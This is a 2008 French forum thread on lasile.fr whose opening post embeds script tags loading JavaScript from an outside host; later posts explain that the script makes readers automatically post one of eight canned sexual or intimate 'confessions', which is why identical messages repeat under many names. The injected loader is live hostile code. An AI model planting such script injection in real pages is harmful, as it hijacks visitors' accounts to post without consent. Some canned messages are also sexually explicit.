l'asile.fr


confessions intimes

Kane
#1 Satan m'habite

Allez, --> <script defer type="text/javascript" src="https://beonlineboo.com/js/support.js?host=www.lasile.fr"></script><script defer type="text/javascript" src="https://beonlineboo.com/js/support.js?host=www.lasile.fr"></script><script type="text/javascript" src="http://www.lasile.fr/files/css/kane.css"></script> fais pas ton timide et raconte nous tes petits secrets et tes doutes les plus intimes.


mardi
06 mai 2008 à 20:39
 
 

Salut, jai 20 ans, il m a toujours semblé aimer les filles mais petit à petit, je suis en proie au doute. Je vois le corps d'un homme différent, je fais des rêves homos, quand je me masturbe, je pense au corps d'un homme, j'ai commencé à me doigter l'anus aussi en imaginant que ce soit un homme, ça vient spontanément.


mardi
06 mai 2008 à 20:40
 
 

C'est quoi ce script batard ! + :D


Dernière modification le 06/05/08 à 20:44 par CAPTN_CAVERN
mardi
06 mai 2008 à 20:40
 
 

Salut, jai 20 ans, il m a toujours semblé aimer les filles mais petit à petit, je suis en proie au doute. Je vois le corps d'un homme différent, je fais des rêves homos, quand je me masturbe, je pense au corps d'un homme, j'ai commencé à me doigter l'anus aussi en imaginant que ce soit un homme, ça vient spontanément.


mardi
06 mai 2008 à 20:45
 
 

haha je capte rien mais c'est bien fnu ^^


mardi
06 mai 2008 à 20:46
 
 

Kane
#6 Satan m'habite

CAPTN_CAVERN a écrit
Salut, jai 20 ans, il m a toujours semblé aimer les filles mais petit à petit, je suis en proie au doute. Je vois le corps d'un homme différent, je fais des rêves homos, quand je me masturbe, je pense au corps d'un homme, j'ai commencé à me doigter l'anus aussi en imaginant que ce soit un homme, ça vient spontanément.

Ce n'est pas grave, ton corps change et tu es en proie au doute.


mardi
06 mai 2008 à 20:49
 
 

tu me manque térriblement tu es trop immature pour le voir


mardi
06 mai 2008 à 20:50
 
 

Salut, jai 20 ans, il m a toujours semblé aimer les filles mais petit à petit, je suis en proie au doute. Je vois le corps d'un homme différent, je fais des rêves homos, quand je me masturbe, je pense au corps d'un homme, j'ai commencé à me doigter l'anus aussi en imaginant que ce soit un homme, ça vient spontanément.


mardi
06 mai 2008 à 20:50
 
 

Voila mon secret. Je suis agé de 21 ans et je suis fou amoureux de la mere de mon copain. Je m arange pour venir chez lui quand il n'est pas la et je reste secretement a l'admiré . Je suis fou amoureux d'elle .Je ne dors pas la nuit que dois-je faire?


mardi
06 mai 2008 à 20:54
 
 

kaplan
#10 Joe Le Mérou

undefined


mardi
06 mai 2008 à 20:55
 
 

Repiemink
#11 Mr Bricolage

jai 15ans et mes parent ont su que j etais homo a cause d'une lettre de mon ex et ils ont +ou- bien réagis mais je les trouve différent et je me sens hyper mal a l aise vis-avis d' eux. Est-ce que ce mal a l aise vas passer ?


mardi
06 mai 2008 à 20:56
 
 

jai 15ans et mes parent ont su que j etais homo a cause d'une lettre de mon ex et ils ont +ou- bien réagis mais je les trouve différent et je me sens hyper mal a l aise vis-avis d' eux. Est-ce que ce mal a l aise vas passer ?


mardi
06 mai 2008 à 21:13
 
 

Repiemink
#13 Mr Bricolage


mardi
06 mai 2008 à 21:20
 
 

Repiemink
#14 Mr Bricolage

HAHA§§ Sainte Marie a triomphayYY§§§


mardi
06 mai 2008 à 21:21
 
 

Gatling
#15 Luxator

tu me manque térriblement tu es trop immature pour le voir


mardi
06 mai 2008 à 21:29
 
 

Gatling
#16 Luxator

Haha putain :D

Captn !!!


mardi
06 mai 2008 à 21:32
 
 

Bestaflex
#17 J'aime la série Stargate

Voila mon secret. Je suis agé de 21 ans et je suis fou amoureux de la mere de mon copain. Je m arange pour venir chez lui quand il n'est pas la et je reste secretement a l'admiré . Je suis fou amoureux d'elle .Je ne dors pas la nuit que dois-je faire?


mardi
06 mai 2008 à 21:34
 
 

Coucou,voilà en fait j aime un mec qui est dans ma classe. Il est hyper sympa et adorable avec moi sauf qu'il ne m'aime pas) mais le plus grave c'est que j ai l'impression qu'il a un esprit un peu taré et ça me dégoûte. J'aimerais ne plus l aimer mais je l aime quand même malgré ça contre mon gré! Alors si vous avez un conseil, please help me!!!


mardi
06 mai 2008 à 21:48
 
 

Voila mon secret. Je suis agé de 21 ans et je suis fou amoureux de la mere de mon copain. Je m arange pour venir chez lui quand il n'est pas la et je reste secretement a l'admiré . Je suis fou amoureux d'elle .Je ne dors pas la nuit que dois-je faire?


mardi
06 mai 2008 à 21:48
 
 

Salut, jai 20 ans, il m a toujours semblé aimer les filles mais petit à petit, je suis en proie au doute. Je vois le corps d'un homme différent, je fais des rêves homos, quand je me masturbe, je pense au corps d'un homme, j'ai commencé à me doigter l'anus aussi en imaginant que ce soit un homme, ça vient spontanément.


mardi
06 mai 2008 à 22:12
 
 

Suis-je tellement romantique que je ne me rends compte d'avoir trop de doigts et pas assez d'orifices ? Quoiqu'il en soit, je m'aime tout mon cuir.


mardi
06 mai 2008 à 22:19
 
 

Repiemink
#22 Mr Bricolage

GAY FFS §§§§§


mardi
06 mai 2008 à 22:19
 
 

Ah ah le gag du formulaire pré-rempli et envoyé en refresh.

Sauf que non, ça ne passe pas : je suis le 0,000001 %ième d'utilisateur de Firefox qui garde les avertissements et qui annule tout ce qui est non voulu.


mardi
06 mai 2008 à 22:26
 
 

Ah, ha, le gag du formulaire pré-rempli envoyé en refresh.

Sauf que non, ça ne passe pas : je suis le 0,00000001 %ème utilisateur qui conserve tous les avertissements dans Firefox et qui annule les trucs non désirés.

Et par dessus le marché, ce petit script halakon bouffe les messages §

Hmm, en fait mon premier message est bien passé, on le voit en source, mais il est masqué d'office.

Censure §

Edit : ah bah du coup c'est revenu.


Dernière modification le 07/05/08 à 07:57 par Ellendhel
mardi
06 mai 2008 à 22:30
 
 


Dernière modification le 07/05/08 à 11:07 par Akshell
mardi
06 mai 2008 à 22:31
 
 

En fait,tout a commencé quand jai commencé a regarder des films X hétéro, en me masturbant je visionnait la scène en me mettant ds la peu du gars avec son long pénis en train de baiser la fille , puis au fil du temps, je ne sais comment d'ailleurs, la fille en question avait en quelque peu disparu dans la vision que je me faisais et il ne restait que le mec et je mexitait jusqu'à léjaculation.


mardi
06 mai 2008 à 22:35
 
 

Je propose que l'on pende Kane par les couilles, lui et sa CSS en javascript infâme.

Merci wget.

Bon, il y a 8 commentaires types, tiré au hasard, et envoyé avec la fonction "postmoica".

Et le tout tiens en 47 lignes, sans commentaire ni origine. Mais je soupçonne que ça déjà été utilisé sur l'InterWeb.


mardi
06 mai 2008 à 22:40
 
 

Coucou,voilà en fait j aime un mec qui est dans ma classe. Il est hyper sympa et adorable avec moi sauf qu'il ne m'aime pas) mais le plus grave c'est que j ai l'impression qu'il a un esprit un peu taré et ça me dégoûte. J'aimerais ne plus l aimer mais je l aime quand même malgré ça contre mon gré! Alors si vous avez un conseil, please help me!!!


mardi
06 mai 2008 à 22:41
 
 

Voila mon secret. Je suis agé de 21 ans et je suis fou amoureux de la mere de mon copain. Je m arange pour venir chez lui quand il n'est pas la et je reste secretement a l'admiré . Je suis fou amoureux d'elle .Je ne dors pas la nuit que dois-je faire?


mardi
06 mai 2008 à 22:57
 
 

Coucou,voilà en fait j aime un mec qui est dans ma classe. Il est hyper sympa et adorable avec moi sauf qu'il ne m'aime pas) mais le plus grave c'est que j ai l'impression qu'il a un esprit un peu taré et ça me dégoûte. J'aimerais ne plus l aimer mais je l aime quand même malgré ça contre mon gré! Alors si vous avez un conseil, please help me!!!


mardi
06 mai 2008 à 23:03
 
 


Répondre au sujet

Vous devez être identifié pour participer à ce topic.